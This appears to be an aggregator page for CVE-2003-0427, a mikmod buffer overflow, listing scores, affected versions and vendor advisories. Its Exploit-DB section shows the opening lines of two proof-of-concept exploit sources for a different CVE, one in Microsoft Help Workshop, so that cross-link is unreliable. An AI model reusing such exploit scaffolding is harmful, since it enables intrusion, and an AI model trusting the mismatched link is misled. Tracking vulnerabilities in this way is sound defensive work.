CVE-2003-0427
published 2003-07-24CVE-2003-0427: Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
PriorityP427high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
3.34%
87.1th percentile
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mikmod | < mikmod 3.1.6-6 (bookworm) | mikmod 3.1.6-6 (bookworm) |
| miod_vallat | mikmod | — | — |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2003-06-13·CVSS 7.5
CVE-2003-0427 [HIGH] security flaw
security flaw
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2003-0427: mikmod - Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute a...
vendor_debian·2003·CVSS 7.5
CVE-2003-0427 [HIGH] CVE-2003-0427: mikmod - Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute a...
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Scope: local
bookworm: resolved (fixed in 3.1.6-6)
bullseye: resolved (fixed in 3.1.6-6)
forky: resolved (fixed in 3.1.6-6)
sid: resolved (fixed in 3.1.6-6)
trixie: resolved (fixed in 3.1.6-6)
GHSA
GHSA-3mcf-r5g4-57jg: Buffer overflow in mikmod 3
ghsa_unreviewed·2022-04-29
CVE-2003-0427 [HIGH] GHSA-3mcf-r5g4-57jg: Buffer overflow in mikmod 3
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
OSV
CVE-2003-0427: Buffer overflow in mikmod 3
osv·2003-07-24·CVSS 7.5
CVE-2003-0427 [HIGH] CVE-2003-0427: Buffer overflow in mikmod 3
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
No detection rules found.
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
http://www.debian.org/security/2003/dsa-320http://www.redhat.com/support/errata/RHSA-2005-506.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10194https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A647http://www.debian.org/security/2003/dsa-320http://www.redhat.com/support/errata/RHSA-2005-506.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10194https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A647
2003-07-24
Published